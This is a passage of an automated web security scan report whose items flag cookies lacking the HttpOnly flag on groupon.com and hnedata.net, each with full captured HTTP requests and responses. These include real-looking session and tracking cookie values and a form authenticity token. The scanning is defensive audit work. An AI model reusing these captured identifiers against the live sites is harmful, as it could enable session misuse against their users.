Set-Cookie: io_freq_p1="eJzjEue4GiHAJLFiyoJ3LAoMGgwGjBZgNpc4x/FAARaJpxMQEmA2UGK3NVDHY7gEk8UdqMQCF6DE/2fz4RLPQWwuYY71rkCJLRd+vYVIMFgwAAW3hQowSkzuO40iuNcFKDhr/lqEIAArXi/T"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.111. http://www.groupon.com/dallas/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /dallas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: visited=visit_1; path=/; expires=Sun, 09-May-2021 15:38:13 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:13 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/subscriptions/new?division_p=dallas
X-Runtime: 34
Cache-Control: no-cache
Content-Length: 124
Connection: keep-alive

<html><body>You are being <a href="http://www.groupon.com/subscriptions/new?division_p=dallas">redirected</a>.</body></html>

11.112. http://www.groupon.com/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 200
ETag: "0345c004e46753e8c959a4f64568fdd0"
X-Runtime: 100
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.113. http://www.groupon.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:38 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:38 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:38 GMT; HttpOnly
Status: 200
ETag: "0b5465a4051743e698e7fc66860eed29"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.114. http://www.groupon.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.115. http://www.groupon.com/subscriptions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...

11.116. https://www.groupon.com/dallas/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /dallas/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:06 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/dallas/
X-Runtime: 11
Cache-Control: no-cache
Content-Length: 96

<html><body>You are being <a href="http://www.groupon.com/dallas/">redirected</a>.</body></html>

11.117. https://www.groupon.com/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:24 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/learn
X-Runtime: 15
Cache-Control: no-cache
Content-Length: 94

<html><body>You are being <a href="http://www.groupon.com/learn">redirected</a>.</body></html>

11.118. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.119. https://www.groupon.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/mobile
X-Runtime: 13
Cache-Control: no-cache
Content-Length: 95

<html><body>You are being <a href="http://www.groupon.com/mobile">redirected</a>.</body></html>

11.120. https://www.groupon.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

11.121. https://www.groupon.com/users/new

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

11.122. http://www.hnedata.net/features/tr_stock_charts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hnedata.net
Path:   /features/tr_stock_charts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/tr_stock_charts HTTP/1.1
Host: www.hnedata.net
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: 0
cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: FreakAuth=5518e37387eae06696e574f8c1f4da91; expires=Mon, 09-May-2011 17:37:33 GMT; path=/
Last-Modified: Mon, 09 May 2011 15:37:09 GMT
Content-Type: text/html
Content-Length: 1583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic<
...[SNIP]...

